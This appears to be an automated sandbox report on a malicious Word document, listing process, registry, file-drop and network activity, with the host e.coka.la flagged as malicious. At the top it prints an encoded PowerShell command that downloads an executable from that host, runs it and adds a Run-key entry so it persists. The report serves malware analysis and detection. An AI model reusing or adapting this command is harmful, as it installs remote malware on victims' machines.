3780PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARQBxADUAQwB1AFMAdgBmAHYAegB4AF8AawBLAE0ASAA4AEwAQQA1AGcAYgBOAHYAIAAoACAAJABRAEgASgBpADcAbwBrAHgAVwB2ADkAcwBHAFIAVQBLAFAAIAAsACAAJAB3AFUAbwBXAGkAbgBHAHgAYgBnAGEAawBLAGcAbQBhAEgAdABsACAAKQANAAoAewANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABRAEgASgBpADcAbwBrAHgAVwB2ADkAcwBHAFIAVQBLAFAAIAAsACAAJAB3AFUAbwBXAGkAbgBHAHgAYgBnAGEAawBLAGcAbQBhAEgAdABsACAAKQA7AHMAdABhAHIAdAAgACQAdwBVAG8AVwBpAG4ARwB4AGIAZwBhAGsASwBnAG0AYQBIAHQAbAAgADsAIAANAAoAfQANAAoAdAByAHkAewANAAoADQAKACQAUwBVAGIARwBrAF8ANAAyAEMAOQA4AE0AQQBlAGsAVwBHAHoAbQBIADkAagA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwATwBUAEMAawBlAG8AbQBGAC4AZQB4AGUAJwA7AA0ACgBFAHEANQBDAHUAUwB2AGYAdgB6AHgAXwBrAEsATQBIADgATABBADUAZwBiAE4AdgAgACcAaAB0AHQAcABzADoALwAvAGUALgBjAG8AawBhAC4AbABhAC8AVQBJAEkAQwBiADYALgBqAHAAZwAnACAAJABTAFUAYgBHAGsAXwA0ADIAQwA5ADgATQBBAGUAawBXAEcAegBtAEgAOQBqADsADQAKACQARABWAFgAZQBlAEUANwBqAG0AaQBwAFQANwBYAFAAVQBPAHAAUAB1AEIANQBDAG4AdwBDAFEAVAAgAD0AJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQArACcAXABPAFQAQwBrAGUAbwBtAEYALgBlAHgAZQAnADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAG0AZQAgACcAMQAwADEAMAAxADAAMQAnACAALQBWAGEAbAB1AGUAIAAkAEQAVgBYAGUAZQBFADcAagBtAGkAcABUADcAWABQAFUATwBwAFAAdQBCADUAQwBuAHcAQwBRAFQAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAJwBTAHQAcgBpAG4AZwAnACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsADQAKAA0ACgB9AGMAYQB0AGMAaAB7AH0AC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
1 736
Read events
1 309
Write events
416
Delete events
11

Modification events

(PID) Process:(3204) MSOXMLED.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1298661391
(PID) Process:(2504) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:4&i
Value:
34266900C8090000010000000000000000000000
(PID) Process:(2504) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2504) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2504) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1298661392
(PID) Process:(2504) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661504
(PID) Process:(2504) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661505
(PID) Process:(2504) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
C80900002E92B5282D77D40100000000
(PID) Process:(2504) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:%)i
Value:
25296900C809000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2504) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:%)i
Value:
25296900C809000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
Executable files
1
Suspicious files
3
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
2504WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA2B4.tmp.cvr
MD5:
SHA256:
3780powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TM97V8G0LUODY3Y1MKIQ.temp
MD5:
SHA256:
2504WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AE2623B.jpg
MD5:
SHA256:
2504WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoA68D.tmp
MD5:
SHA256:
2504WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5933E3AC-49E1-4FBC-904F-56097A0ACAB9}.tmp
MD5:
SHA256:
2504WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B8ECBBCE-8AF9-497A-A864-CF3961CCCAED}.tmp
MD5:
SHA256:
2504WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{657C6539-4EB4-48EE-A6A3-AEB5131F655C}.tmp
MD5:
SHA256:
2504WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c.xml.LNKlnk
MD5:
SHA256:
2504WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:
SHA256:
2504WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
1

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3780
powershell.exe
163.172.215.76:443
e.coka.la
Online S.a.s.
NL
malicious

DNS requests

Domain
IP
Reputation
e.coka.la
  • 163.172.215.76
malicious

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info